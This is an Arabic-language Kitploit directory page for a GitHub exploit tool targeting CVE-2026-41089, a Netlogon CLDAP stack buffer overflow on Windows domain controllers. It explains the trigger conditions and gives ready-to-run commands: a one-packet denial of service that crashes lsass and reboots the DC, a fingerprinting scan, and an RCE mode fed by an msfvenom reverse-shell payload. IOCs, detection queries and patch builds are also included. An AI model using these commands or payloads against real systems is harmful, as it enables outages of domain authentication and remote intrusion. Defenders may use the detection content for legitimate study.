Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-41089 — CVE-2026-41089 هو ثغرة خطيرة لتنفيذ الكود عن بُعد في خدمة Windows Netlogon، حيث يمكن لحزمة واحدة أن تتسبب في تعطل lsass.exe، مما يؤدي إلى إعادة تشغيل وحدة تحكم المجال خلال حوالي 30-60 ثانية. خلال هذه الفترة، ستفشل جميع عمليات مصادقة المجال في وحدة تحكم المجال هذه. | Kitploit
أدوات/GitHubGitHub/hnytgl/cve-2026-41089
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأداة الوصول عن بعداستغلال الملفات الثنائية
GitHubhnytgl/cve-2026-41089

CVE-2026-41089

CVE-2026-41089 هو ثغرة خطيرة لتنفيذ الكود عن بُعد في خدمة Windows Netlogon، حيث يمكن لحزمة واحدة أن تتسبب في تعطل lsass.exe، مما يؤدي إلى إعادة تشغيل وحدة تحكم المجال خلال حوالي 30-60 ثانية. خلال هذه الفترة، ستفشل جميع عمليات مصادقة المجال في وحدة تحكم المجال هذه.

عرض المستودع
141214منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-41089 — Windows Netlogon CLDAP Stack Buffer Overflow RCE Exploit

CVE-ID: CVE-2026-41089
CVSS: 9.8 (Critical)
CWE: CWE-121 (Stack-based Buffer Overflow)
ناقل الهجوم: UDP/389 (CLDAP SearchRequest)
التأثير: تنفيذ تعليمات برمجية عن بُعد (RCE) / رفض الخدمة (DoS)
الإصدارات المتأثرة: Windows Server 2012 R2 ~ 2025 (وحدات تحكم النطاق)
التصحيح: التحديث التراكمي لشهر مايو 2026

نظرة عامة على الثغرة

توجد ثغرة تجاوز سعة المخزن المؤقت للمكدس في وظيفة NetpLogonPutUnicodeString الموجودة في netlogon.dll عند معالجة طلبات بحث CLDAP. تستقبل هذه الوظيفة ميزانية طول بالبايت، ولكنها تفسرها على أنها عدد WCHAR، مما يؤدي إلى كتابة ضعف الكمية المتوقعة.

يحدث الفائض في المخزن المؤقت للمكدس الثابت 528 بايت (264 ushort) في وظيفة NlGetLocalPingResponse. حقل User الذي يتحكم به المهاجم بالإضافة إلى اسم DNS الخاص بالخادم يملآن هذا المخزن المؤقت، مما يؤدي في النهاية إلى تجاوز GS Security Cookie والتسبب في تعطل و .

__report_gsfailure
lsass.exe

شروط التشغيل

  • في طلب بحث CLDAP، NtVer=0x02 (يفرض استخدام المسار القديم الثغري BuildSamLogonResponse)
  • طول حقل User ≥ حوالي 130 حرفًا (الحد الأقصى الثنائي حوالي 260 بايت UTF-16)
  • طول اسم DNS للخادم ≥ حوالي 80 حرفًا (كلما زاد طول اسم النطاق، زادت سهولة الوصول إلى Cookie)

ملاحظة: NtVer=0x16 (القيمة المستخدمة في العديد من نصوص الكشف العامة) تؤدي إلى تشغيل المسار الآمن BuildSamLogonResponseEx، ولا تؤدي إلى تشغيل الثغرة.

الوظائف

الوضعالوصف
--mode dosإرسال حزمة CLDAP مصممة بعناية تؤدي إلى تعطل LSASS وإعادة تشغيل DC (انقطاع المصادقة لمدة ~60 ثانية)
--mode rceمحاولة تنفيذ تعليمات برمجية عن بُعد (على مستوى بحثي، يتطلب shellcode)
--mode scanمسح استجابات قيم NtVer المختلفة لتحديد بصمة DC المستهدف
--mode autoالكشف التلقائي واختيار أفضل استراتيجية هجوم

وضع DoS

حزمة واحدة تكفي لتعطل lsass.exe، مما يؤدي إلى إعادة تشغيل وحدة تحكم النطاق خلال حوالي 30-60 ثانية. خلال هذه الفترة، ستفشل جميع مصادقات النطاق على هذا DC.

root@kitploit:~
# الاستخدام الأساسي — إرسال 3 حزم
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos

# هجوم سريع بحزمة واحدة
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1

# الوضع العدواني — 5 حزم متزامنة
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1

وضع RCE

⚠️ على مستوى بحثي — غير موثوق به وغير مستقر في البيئات الحقيقية.

يواجه RCE التحديات التالية:

  1. بيانات الفائض هي اسم DNS للخادم نفسه، وليست shellcode للمهاجم
  2. يجب تجاوز GS Cookie (يتطلب بدائية تسريب معلومات أو تخمين عنيف)
  3. CET/ACG/CFG على Server 2022+ تجعل ROP التقليدي أكثر صعوبة
root@kitploit:~
# إنشاء shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
         -f raw -o shellcode.bin

# إرسال سلسلة RCE
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
    --shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444

وضع المسح

root@kitploit:~
# تحديد بصمة DC المستهدف
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan

مثال على الإخراج المتوقع (هدف مصحح):

root@kitploit:~
NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

مثال على الإخراج المتوقع (هدف غير مصحح):

root@kitploit:~
NtVer=0x00000002 → TIMEOUT (5001 ms)    ← تعطل LSASS!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

إذا انتهت مهلة NtVer=0x02 بينما استجابت الإصدارات الأخرى بشكل طبيعي، فمن المحتمل جدًا أن الهدف به ثغرة.

المعلمات المتقدمة

المعلمةالوصفالقيمة الافتراضية
-l, --user-lenطول حقل اسم المستخدم (عدد أحرف ASCII)180
--ntverقيمة NtVer (سداسي عشري، مثل 0x02)0x02
--countعدد حزم DoS المرسلة3
--delayالتأخير بين الحزم (ثوانٍ)0.5
-t, --timeoutمهلة المقبس (ثوانٍ)5.0
--jsonإخراج النتائج بتنسيق JSON—
--rawطباعة الحزمة الخام بالست عشري قبل الإرسال—
--quietإخفاء إخراج الشعار—
--shellcode-fileملف shellcode مخصص (x64 خام)—
--lhostعنوان استماع الصدفة العكسية—
--lportمنفذ استماع الصدفة العكسية4444

إعداد بيئة الاختبار

root@kitploit:~
# إنشاء DC باسم نطاق طويل على Windows Server (غير مصحح):
# 1. رفع إلى وحدة تحكم نطاق (اسم DNS طويل جدًا، مثل "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. تأكد من تثبيت التصحيحات قبل مايو 2026
# 3. تشغيل من جهاز المهاجم:
python CVE-2026-41089-exp.py <DC_IP> <LONG_DOMAIN_NAME> --mode dos --count 1
# 4. مراقبة تعطل DC وإعادة تشغيله

مؤشرات الاختراق (IOCs)

الشبكة

  • طلب بحث CLDAP على UDP/389 مع User > 100 بايت و NtVer = 0x02
  • حركة مرور CLDAP غير عادية من مضيف غير تابع لـ DC إلى DC

المضيف

root@kitploit:~
Event ID: 1000
Faulting process: lsass.exe
Faulting module: netlogon.dll
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)

قواعد الكشف

root@kitploit:~
index=wineventlog source="WinEventLog:Application" EventID=1000
  Process_Name="lsass.exe" Exception_Code="0xc0000409"
root@kitploit:~
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"

معلومات التصحيح

إصدار Windows Serverرقم إصدار التصحيحملاحظات
Server 20126.2.9200.26079ESU
Server 2012 R26.3.9600.23181ESU
Server 201610.0.14393.9140
Server 201910.0.17763.8755
Server 202210.0.20348.5074
Server 2022 23H210.0.25398.2330
Server 202510.0.26100.32772

إخلاء مسؤولية قانوني

هذه الأداة مخصصة فقط لـ تقييم الأمن المصرح به، واختبار الاختراق، ومسابقات CTF، والبحث الدفاعي. استخدام هذه الأداة على أي نظام دون الحصول على إذن كتابي صريح يعد غير قانوني. يتحمل المستخدم المسؤولية القانونية الكاملة.

الروابط المرجعية

  • Microsoft Security Update Guide: CVE-2026-41089
  • NVD: CVE-2026-41089
  • Kudelski Security Research — Netlogon Stack Buffer Overflow Analysis
  • SecPod Analysis — IOCs and Detection
  • IONIX Threat Center — CVE-2026-41089
تنزيل الأداة